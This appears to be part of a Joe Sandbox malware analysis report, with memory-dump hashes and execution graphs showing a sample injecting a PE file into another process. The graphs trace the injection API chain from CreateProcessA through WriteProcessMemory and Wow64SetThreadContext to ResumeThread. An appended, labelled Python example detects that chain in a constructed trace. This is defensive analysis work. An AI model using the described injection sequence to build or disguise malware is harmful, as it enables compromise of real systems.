                                                  • Opcode ID: e9125e25db13609b93c4e7862d1f421bd3ac7982e87f2434b73b114542a25521
                                                  • Instruction ID: d1f3b77033e0a01619e5e04731e3324f5fe906d6c0307748cbb6943cf508922e
                                                  • Opcode Fuzzy Hash: e9125e25db13609b93c4e7862d1f421bd3ac7982e87f2434b73b114542a25521
                                                  • Instruction Fuzzy Hash: DE213475504384EFCB14DF16D9C0B26BBA1FB84314F28C56DD90A0B292C77AD847CA62
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4535305653.0000000000CED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CED000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_ced000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 131645fda8ce4d8769cc48fa9c7012b342836cd133e3c406fafc16978422c12a
                                                  • Instruction ID: 1f1a64422fc4c47943abe369b2d4aea3279f86eae7125ea6c6d73068a90a7123
                                                  • Opcode Fuzzy Hash: 131645fda8ce4d8769cc48fa9c7012b342836cd133e3c406fafc16978422c12a
                                                  • Instruction Fuzzy Hash: 7321487550D3C09FCB03CB24D990715BF71AB46214F2985EBD8898F2A7C23A984ACB62
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4828307f687091b65cf4c888002413893c1aadd24286584d1bfc70298cdb296c
                                                  • Instruction ID: 364d5c2736c9ff56d4810e3a970d3a103c656aba1b10bb35903d79705c30ab2e
                                                  • Opcode Fuzzy Hash: 4828307f687091b65cf4c888002413893c1aadd24286584d1bfc70298cdb296c
                                                  • Instruction Fuzzy Hash: 88217F30F1111E9BDF94EB69E95069EB7BAEF85310F208469E405EF784DB71ED418B80
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a33d731ac10c5bd159e2733cbe4ee44e6f353b3e1c9b1244ea7bc1a67c169476
                                                  • Instruction ID: c38512fba365743c4d2ec712717a3a63bb2a0d48150e1007047b4302a6a334f9
                                                  • Opcode Fuzzy Hash: a33d731ac10c5bd159e2733cbe4ee44e6f353b3e1c9b1244ea7bc1a67c169476
                                                  • Instruction Fuzzy Hash: E711C231F0015A4FDB61DA68D4606AA77E5FB8A224F34896AE11ADB782DE21DD028781
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 900714bdad0d1ed349457f82f6224120837e6f72345f4cbda31fd2ef98f258b1
                                                  • Instruction ID: ad91001cbdb6457afb1906d52ddff6f97e2d50287dce29530b28ce14880e86b2
                                                  • Opcode Fuzzy Hash: 900714bdad0d1ed349457f82f6224120837e6f72345f4cbda31fd2ef98f258b1
                                                  • Instruction Fuzzy Hash: 43116131B105298FDF549678D8546AF73FAABC9311B204539D906EB344EE24DC028B91
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a287d995cabf1c6c905cdf30600aa7203f94ff7c02e5a7e4b5f158de84ea7618
                                                  • Instruction ID: ccc6ace47991206fac2903ff9b3039efb52a7375222c98a1b50259af63821e1c
                                                  • Opcode Fuzzy Hash: a287d995cabf1c6c905cdf30600aa7203f94ff7c02e5a7e4b5f158de84ea7618
                                                  • Instruction Fuzzy Hash: 8E01F535B001594FDB229A7D940472BB7EADBC9710F34882EE24ECB341DD61DD024391
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9c3e548e8e797ed15c4ea64671460abc0940e19a464a648f00509c76f7d6bce
                                                  • Instruction ID: 5bff97d0a33b8e4507df021cd6ff7f2da482a8c793a87c1006c79b81a67ba3e2
                                                  • Opcode Fuzzy Hash: d9c3e548e8e797ed15c4ea64671460abc0940e19a464a648f00509c76f7d6bce
                                                  • Instruction Fuzzy Hash: 6701B534B041850FDB769A7C945072A7BEADFC6610B34486EE58ACF341DD14DC028391
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4d62992b3da99bfe749ee3fed9576fb4000d1a41160ef8409dd648e497a4981
                                                  • Instruction ID: 0d505b55bb94f01eca5b316a38292ea7e9b8579903dc4e905474bcefd8d7a728
                                                  • Opcode Fuzzy Hash: c4d62992b3da99bfe749ee3fed9576fb4000d1a41160ef8409dd648e497a4981
                                                  • Instruction Fuzzy Hash: 0E110830F1025D4FDF249B28D9507AAB7AAEB85310F2004BED10DDB340DB30DD419B92
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 30b854b06f183616ffe5b80bd5ccced7c8477bcd83343e68b5d7fa6049ebe933
                                                  • Instruction ID: e79298f2aee25d5f50bc1ab0eec1b42341498ec945738c51fddbf1614589b474
                                                  • Opcode Fuzzy Hash: 30b854b06f183616ffe5b80bd5ccced7c8477bcd83343e68b5d7fa6049ebe933
                                                  • Instruction Fuzzy Hash: F821C7B5D01259AFCB00DF9AD884ACEFFB4FF49320F108169E518A7240D3746554CBA5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da5113a6d7d8467fe87cab9348d6ef4c98ea18e26df381cc94a8dc8810de4044
                                                  • Instruction ID: c341f9bbbdde27ce03cee5b6fe6510ac516b3e889e45bacce79fc21ab1e5b872
                                                  • Opcode Fuzzy Hash: da5113a6d7d8467fe87cab9348d6ef4c98ea18e26df381cc94a8dc8810de4044
                                                  • Instruction Fuzzy Hash: C201D432B1116A4BDB549A6CDC606FFB7BAABC8220F24453ED546DB344EE64CC0287E1
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 27aba0ea38442ff8e27a12a24ae6af7f16baf8d5dd136ed8736f899d4dcc8ef3
                                                  • Instruction ID: 4de7446bbaea9b5a8761c61f28c2e1e66c5d0ee09bb1d290e93d5f1bcea991d0
                                                  • Opcode Fuzzy Hash: 27aba0ea38442ff8e27a12a24ae6af7f16baf8d5dd136ed8736f899d4dcc8ef3
                                                  • Instruction Fuzzy Hash: 2E11D3B5D01259AFCB00DF9AD884ACEFFB4FB48310F20816AE518A7300C374A954CFA5
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4bd6e12638bce5da3ee527cb14467d1d175c1d8629b424d139dad1d83d5c7fe
                                                  • Instruction ID: 1bdbdb0d1953d224b5d17448361dfeb83df258f13fb4ab27d8b0e61557d115ea
                                                  • Opcode Fuzzy Hash: c4bd6e12638bce5da3ee527cb14467d1d175c1d8629b424d139dad1d83d5c7fe
                                                  • Instruction Fuzzy Hash: 79018C35B001194BEB659A6E945572BB3EFDBC9B10F34883AE60ECB784DE65DC024391
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef8ce8b825b33c68a02dd0aedd1f1d5d3b458f4cbcb70fa75f85336e50e8826d
                                                  • Instruction ID: 277829cc7bbe0498826a0e71926f17f2c9c123c2db61e7bf9050279a33c82c5b
                                                  • Opcode Fuzzy Hash: ef8ce8b825b33c68a02dd0aedd1f1d5d3b458f4cbcb70fa75f85336e50e8826d
                                                  • Instruction Fuzzy Hash: E401AF39B000194BEB65A67D9450B2F77DBDBCA720F34883AE60ECB780DE65DC024391
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 55cb31d3d745fd3916a876cdec0c9f9fa8b6f558cc2a63b5c6366babe3b07e85
                                                  • Instruction ID: 675faf7c534288e0f3abd2100a30898552469f7d85118a5c1763029b23e16b85
                                                  • Opcode Fuzzy Hash: 55cb31d3d745fd3916a876cdec0c9f9fa8b6f558cc2a63b5c6366babe3b07e85
                                                  • Instruction Fuzzy Hash: 5F01A430B1011A4FDB65E67CD46172A73DAFBCA714F304829F10ACB745DE25ED028381
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 726f02d79c79a3f3976e67ea1e8622283dbe4a2ef48207a15acc3558b2825684
                                                  • Instruction ID: 86af82e2583ade329330927662a91f5a640c2b343b396f444ab6e61817c38362
                                                  • Opcode Fuzzy Hash: 726f02d79c79a3f3976e67ea1e8622283dbe4a2ef48207a15acc3558b2825684
                                                  • Instruction Fuzzy Hash: 5901C831E1025D8BEF64966CD44479EBBAAE785324F30443AE519EF740D631ED458781
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b43a3af90f1c01cdd1fd1b05ac4dc05ffbbf03e5642a960337e7bdc0b32904e
                                                  • Instruction ID: 7a4114fd6c429b2f4684547f5734fc58080e7f5daf3905861cc4eccf0fb53ed9
                                                  • Opcode Fuzzy Hash: 5b43a3af90f1c01cdd1fd1b05ac4dc05ffbbf03e5642a960337e7bdc0b32904e
                                                  • Instruction Fuzzy Hash: 8CF0C232B0010BCFEF649A94EA812B977E9EB80315F344426E905DFB66DB31DE02C791
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f37dda268783c6f8d254e667ff3048cc692d8e2e0ed1de933d5c091783465d1f
                                                  • Instruction ID: 47c6e44ed91a1109edb7ca7776acff2d715817ab2b290b8b722fe7f32ce5fc81
                                                  • Opcode Fuzzy Hash: f37dda268783c6f8d254e667ff3048cc692d8e2e0ed1de933d5c091783465d1f
                                                  • Instruction Fuzzy Hash: AFE01A71E191099FDB60CFB589847AA7BEAEF41308F3448A9D44ACB641E237C9428B50

                                                  Execution Graph

                                                  Execution Coverage: 11%
                                                  Dynamic/Decrypted Code Coverage: 100%
                                                  Signature Coverage: 0%
                                                  Total number of Nodes: 168
                                                  Total number of Limit Nodes: 9
                                                  execution_graph 21514 6a1ad40 21515 6a1aecb 21514->21515 21517 6a1ad66 21514->21517 21517->21515 21518 6a176d0 21517->21518 21519 6a1afc0 PostMessageW 21518->21519 21520 6a1b02c 21519->21520 21520->21517 21338 6a17f79 21339 6a17f7f 21338->21339 21340 6a17f90 21339->21340 21344 6a19b29 21339->21344 21359 6a19b9e 21339->21359 21375 6a19b38 21339->21375 21345 6a19b52 21344->21345 21357 6a19b5a 21345->21357 21390 6a1a121 21345->21390 21395 6a1a4fe 21345->21395 21400 6a1a0d6 21345->21400 21405 6a1a432 21345->21405 21410 6a1a213 21345->21410 21415 6a1a28c 21345->21415 21419 6a1a22d 21345->21419 21424 6a19f6a 21345->21424 21428 6a1a18b 21345->21428 21433 6a1a026 21345->21433 21437 6a1a2e4 21345->21437 21441 6a1a5a0 21345->21441 21357->21340 21360 6a19b2c 21359->21360 21361 6a19ba1 21359->21361 21362 6a1a121 2 API calls 21360->21362 21363 6a1a5a0 2 API calls 21360->21363 21364 6a1a2e4 2 API calls 21360->21364 21365 6a1a026 2 API calls 21360->21365 21366 6a1a18b 2 API calls 21360->21366 21367 6a19f6a 2 API calls 21360->21367 21368 6a1a22d 2 API calls 21360->21368 21369 6a1a28c 2 API calls 21360->21369 21370 6a1a213 2 API calls 21360->21370 21371 6a1a432 2 API calls 21360->21371 21372 6a1a0d6 2 API calls 21360->21372 21373 6a19b5a 21360->21373 21374 6a1a4fe 2 API calls 21360->21374 21361->21340 21362->21373 21363->21373 21364->21373 21365->21373 21366->21373 21367->21373 21368->21373 21369->21373 21370->21373 21371->21373 21372->21373 21373->21340 21374->21373 21376 6a19b52 21375->21376 21377 6a1a121 2 API calls 21376->21377 21378 6a1a5a0 2 API calls 21376->21378 21379 6a1a2e4 2 API calls 21376->21379 21380 6a1a026 2 API calls 21376->21380 21381 6a1a18b 2 API calls 21376->21381 21382 6a19f6a 2 API calls 21376->21382 21383 6a1a22d 2 API calls 21376->21383 21384 6a1a28c 2 API calls 21376->21384 21385 6a1a213 2 API calls 21376->21385 21386 6a1a432 2 API calls 21376->21386 21387 6a1a0d6 2 API calls 21376->21387 21388 6a19b5a 
21376->21388 21389 6a1a4fe 2 API calls 21376->21389 21377->21388 21378->21388 21379->21388 21380->21388 21381->21388 21382->21388 21383->21388 21384->21388 21385->21388 21386->21388 21387->21388 21388->21340 21389->21388 21391 6a1a144 21390->21391 21392 6a1a2c2 21391->21392 21445 6a17340 21391->21445 21449 6a17338 21391->21449 21453 6a17430 21395->21453 21457 6a17428 21395->21457 21396 6a1a473 21396->21395 21397 6a1a7d7 21396->21397 21397->21357 21401 6a1a0dc 21400->21401 21402 6a1a7be 21401->21402 21461 6a16cc0 21401->21461 21465 6a16cb8 21401->21465 21402->21357 21406 6a1a6ba 21405->21406 21469 6a16d70 21406->21469 21473 6a16d68 21406->21473 21407 6a1a60d 21407->21357 21411 6a1a0ed 21410->21411 21412 6a1a7be 21411->21412 21413 6a16cc0 ResumeThread 21411->21413 21414 6a16cb8 ResumeThread 21411->21414 21412->21357 21413->21411 21414->21411 21417 6a17340 WriteProcessMemory 21415->21417 21418 6a17338 WriteProcessMemory 21415->21418 21416 6a1a2c2 21417->21416 21418->21416 21420 6a1a1a2 21419->21420 21421 6a1a23a 21419->21421 21420->21419 21422 6a17340 WriteProcessMemory 21420->21422 21423 6a17338 WriteProcessMemory 21420->21423 21422->21420 21423->21420 21477 6a179c8 21424->21477 21481 6a179bc 21424->21481 21429 6a1a191 21428->21429 21430 6a1a23a 21429->21430 21431 6a17340 WriteProcessMemory 21429->21431 21432 6a17338 WriteProcessMemory 21429->21432 21431->21429 21432->21429 21435 6a16d70 Wow64SetThreadContext 21433->21435 21436 6a16d68 Wow64SetThreadContext 21433->21436 21434 6a1a045 21434->21357 21435->21434 21436->21434 21439 6a17340 WriteProcessMemory 21437->21439 21440 6a17338 WriteProcessMemory 21437->21440 21438 6a1a000 21438->21357 21439->21438 21440->21438 21485 6a17280 21441->21485 21489 6a17278 21441->21489 21442 6a1a5c6 21442->21357 21446 6a17388 WriteProcessMemory 21445->21446 21448 6a173df 21446->21448 21448->21392 21450 6a17388 WriteProcessMemory 21449->21450 21452 6a173df 21450->21452 21452->21392 21454 6a1747b ReadProcessMemory 21453->21454 21456 
6a174bf 21454->21456 21456->21396 21458 6a1747b ReadProcessMemory 21457->21458 21460 6a174bf 21458->21460 21460->21396 21462 6a16d00 ResumeThread 21461->21462 21464 6a16d31 21462->21464 21464->21401 21466 6a16d00 ResumeThread 21465->21466 21468 6a16d31 21466->21468 21468->21401 21470 6a16db5 Wow64SetThreadContext 21469->21470 21472 6a16dfd 21470->21472 21472->21407 21474 6a16db5 Wow64SetThreadContext 21473->21474 21476 6a16dfd 21474->21476 21476->21407 21478 6a17a51 CreateProcessA 21477->21478 21480 6a17c13 21478->21480 21482 6a179c6 CreateProcessA 21481->21482 21484 6a17c13 21482->21484 21486 6a172c0 VirtualAllocEx 21485->21486 21488 6a172fd 21486->21488 21488->21442 21490 6a1727d VirtualAllocEx 21489->21490 21492 6a172fd 21490->21492 21492->21442 21296 273d0b8 21297 273d0fe 21296->21297 21300 273d298 21297->21300 21303 273c9a0 21300->21303 21304 273d300 DuplicateHandle 21303->21304 21305 273d1eb 21304->21305 21306 273ad38 21310 273ae21 21306->21310 21318 273ae30 21306->21318 21307 273ad47 21311 273ae30 21310->21311 21312 273ae64 21311->21312 21326 273b0c3 21311->21326 21330 273b0c8 21311->21330 21312->21307 21313 273ae5c 21313->21312 21314 273b068 GetModuleHandleW 21313->21314 21315 273b095 21314->21315 21315->21307 21319 273ae41 21318->21319 21320 273ae64 21318->21320 21319->21320 21324 273b0c3 LoadLibraryExW 21319->21324 21325 273b0c8 LoadLibraryExW 21319->21325 21320->21307 21321 273ae5c 21321->21320 21322 273b068 GetModuleHandleW 21321->21322 21323 273b095 21322->21323 21323->21307 21324->21321 21325->21321 21327 273b0dc 21326->21327 21329 273b101 21327->21329 21334 273a870 21327->21334 21329->21313 21331 273b0dc 21330->21331 21332 273a870 LoadLibraryExW 21331->21332 21333 273b101 21331->21333 21332->21333 21333->21313 21335 273b2a8 LoadLibraryExW 21334->21335 21337 273b321 21335->21337 21337->21329 21493 2734668 21494 273467a 21493->21494 21495 2734686 21494->21495 21497 2734779 21494->21497 21498 2734788 21497->21498 21502 2734883 21498->21502 21506 2734888 
21498->21506 21504 2734888 21502->21504 21503 273498c 21504->21503 21510 273449c 21504->21510 21507 27348af 21506->21507 21508 273498c 21507->21508 21509 273449c CreateActCtxA 21507->21509 21509->21508 21511 2735918 CreateActCtxA 21510->21511 21513 27359db 21511->21513
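The execution graph above records the API chain behind the "Injects a PE file into a foreign processes" signature: CreateProcessA, then VirtualAllocEx, a WriteProcessMemory call per section (with ReadProcessMemory in between), Wow64SetThreadContext and finally ResumeThread. The calls in the other subgraphs (DuplicateHandle, GetModuleHandleW, LoadLibraryExW, CreateActCtxA) are ordinary .NET runtime activity. The script below is an added example, not part of the Joe Sandbox report or of the sample: it replays a constructed API-call trace (the line format, handle values and the `target.exe` path are assumptions made for the example) through a small state machine that only fires when the calls occur in hollowing order, treats repeated WriteProcessMemory calls as one stage, and notes whether the child was created with CREATE_SUSPENDED (0x4). A process that merely calls CreateProcess and ResumeThread does not trigger it.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List

# Canonical stages of the hollowing chain, in the order they must occur.
STAGES = ("CreateProcess", "VirtualAllocEx", "WriteProcessMemory",
          "SetThreadContext", "ResumeThread")

# Map Win32 / Nt / WoW64 spellings onto the canonical stage name.
ALIASES = {
    "CreateProcessA": "CreateProcess", "CreateProcessW": "CreateProcess",
    "CreateProcessInternalW": "CreateProcess",
    "VirtualAllocEx": "VirtualAllocEx", "NtAllocateVirtualMemory": "VirtualAllocEx",
    "WriteProcessMemory": "WriteProcessMemory", "NtWriteVirtualMemory": "WriteProcessMemory",
    "SetThreadContext": "SetThreadContext", "Wow64SetThreadContext": "SetThreadContext",
    "NtSetContextThread": "SetThreadContext",
    "ResumeThread": "ResumeThread", "NtResumeThread": "ResumeThread",
}
CREATE_SUSPENDED = 0x4

# Assumed trace line format: "<pid> <Api>(<name=value, ...>) = <retval>".
LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\((?P<args>[^)]*)\)\s*=\s*(?P<ret>\S+)$")
FLAGS_RE = re.compile(r"dwCreationFlags=(0x[0-9a-fA-F]+|\d+)")

# Constructed sample trace (not taken from the report). PID 9 performs the
# full chain seen in the graph; PID 12 spawns a child and resumes it without
# writing into it, which must not be flagged.
SAMPLE_TRACE = r"""
9 CreateProcessA(lpApplicationName="C:\\constructed\\target.exe", dwCreationFlags=0x4) = 1
9 ReadProcessMemory(hProcess=0x2c8, lpBaseAddress=0x400000) = 1
9 VirtualAllocEx(hProcess=0x2c8, lpAddress=0x400000, dwSize=0x26000, flProtect=0x40) = 0x400000
9 WriteProcessMemory(hProcess=0x2c8, lpBaseAddress=0x400000, nSize=0x400) = 1
9 WriteProcessMemory(hProcess=0x2c8, lpBaseAddress=0x401000, nSize=0x1e000) = 1
9 WriteProcessMemory(hProcess=0x2c8, lpBaseAddress=0x420000, nSize=0x5000) = 1
9 Wow64SetThreadContext(hThread=0x2cc) = 1
9 ResumeThread(hThread=0x2cc) = 0
12 CreateProcessW(lpApplicationName="C:\\constructed\\notepad.exe", dwCreationFlags=0x0) = 1
12 ResumeThread(hThread=0x1f0) = 0
"""


@dataclass
class Finding:
    pid: int
    stages: List[str] = field(default_factory=list)  # stages reached, in order
    suspended: bool = False                           # child created with CREATE_SUSPENDED
    writes: int = 0                                   # number of WriteProcessMemory calls


def _creation_flags(args: str) -> int:
    m = FLAGS_RE.search(args)
    return int(m.group(1), 0) if m else 0


def analyze(trace: str) -> Dict[int, Finding]:
    """Run every line of the trace through a per-PID ordered state machine."""
    findings: Dict[int, Finding] = {}
    for raw in trace.strip().splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # malformed line: skip rather than guess
        stage = ALIASES.get(m["api"])
        if stage is None:
            continue  # not part of the chain (ReadProcessMemory, runtime calls, ...)
        f = findings.setdefault(int(m["pid"]), Finding(int(m["pid"])))
        nxt = len(f.stages)
        if nxt < len(STAGES) and stage == STAGES[nxt]:
            f.stages.append(stage)            # next expected stage reached
        elif f.stages and stage == f.stages[-1]:
            pass                              # repeat of the current stage (one write per section)
        else:
            continue                          # out of order: ignore
        if stage == "CreateProcess":
            f.suspended = bool(_creation_flags(m["args"]) & CREATE_SUSPENDED)
        elif stage == "WriteProcessMemory":
            f.writes += 1
    return findings


def hollowing_verdict(f: Finding) -> str:
    """Full chain in order is the alert; a long prefix is worth a look; else nothing."""
    if f.stages == list(STAGES):
        return "process hollowing" + (" (suspended child)" if f.suspended else "")
    if len(f.stages) >= 3:
        return "partial chain: " + " -> ".join(f.stages)
    return "no chain"


if __name__ == "__main__":
    for pid, finding in sorted(analyze(SAMPLE_TRACE).items()):
        print(f"pid {pid}: {hollowing_verdict(finding)}, {finding.writes} write(s)")
```

The ordering check matters for precision: debuggers and installers also call WriteProcessMemory and ResumeThread, but rarely in this exact sequence on a child they created suspended. The state machine keys only on PID; a real trace would also correlate the hProcess/hThread handles returned by CreateProcess with those passed to the later calls.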

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 6a179bc-6a17a5d 3 6a17a96-6a17ab6 0->3 4 6a17a5f-6a17a69 0->4 11 6a17ab8-6a17ac2 3->11 12 6a17aef-6a17b1e 3->12 4->3 5 6a17a6b-6a17a6d 4->5 6 6a17a90-6a17a93 5->6 7 6a17a6f-6a17a79 5->7 6->3 9 6a17a7b 7->9 10 6a17a7d-6a17a8c 7->10 9->10 10->10 13 6a17a8e 10->13 11->12 14 6a17ac4-6a17ac6 11->14 18 6a17b20-6a17b2a 12->18 19 6a17b57-6a17c11 CreateProcessA 12->19 13->6 16 6a17ae9-6a17aec 14->16 17 6a17ac8-6a17ad2 14->17 16->12 20 6a17ad4 17->20 21 6a17ad6-6a17ae5 17->21 18->19 23 6a17b2c-6a17b2e 18->23 32 6a17c13-6a17c19 19->32 33 6a17c1a-6a17ca0 19->33 20->21 21->21 22 6a17ae7 21->22 22->16 24 6a17b51-6a17b54 23->24 25 6a17b30-6a17b3a 23->25 24->19 27 6a17b3c 25->27 28 6a17b3e-6a17b4d 25->28 27->28 28->28 30 6a17b4f 28->30 30->24 32->33 43 6a17cb0-6a17cb4 33->43 44 6a17ca2-6a17ca6 33->44 46 6a17cc4-6a17cc8 43->46 47 6a17cb6-6a17cba 43->47 44->43 45 6a17ca8 44->45 45->43 49 6a17cd8-6a17cdc 46->49 50 6a17cca-6a17cce 46->50 47->46 48 6a17cbc 47->48 48->46 51 6a17cee-6a17cf5 49->51 52 6a17cde-6a17ce4 49->52 50->49 53 6a17cd0 50->53 54 6a17cf7-6a17d06 51->54 55 6a17d0c 51->55 52->51 53->49 54->55 57 6a17d0d 55->57 57->57
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A17BFE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 59ca9d7be4681c8084791c3cfaf7cf310b3a2c7a84204ec7bd5796f177f276c0
                                                  • Instruction ID: b2737fe8b1d9e914558e3c57a3d954a5e3bdf449cf231c96ed63f641a5a3c7ac
                                                  • Opcode Fuzzy Hash: 59ca9d7be4681c8084791c3cfaf7cf310b3a2c7a84204ec7bd5796f177f276c0
                                                  • Instruction Fuzzy Hash: 36A15D71D00619CFEB65DF68C8417EEBBB2FF48310F1485A9E809AB240DB749A85CF91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
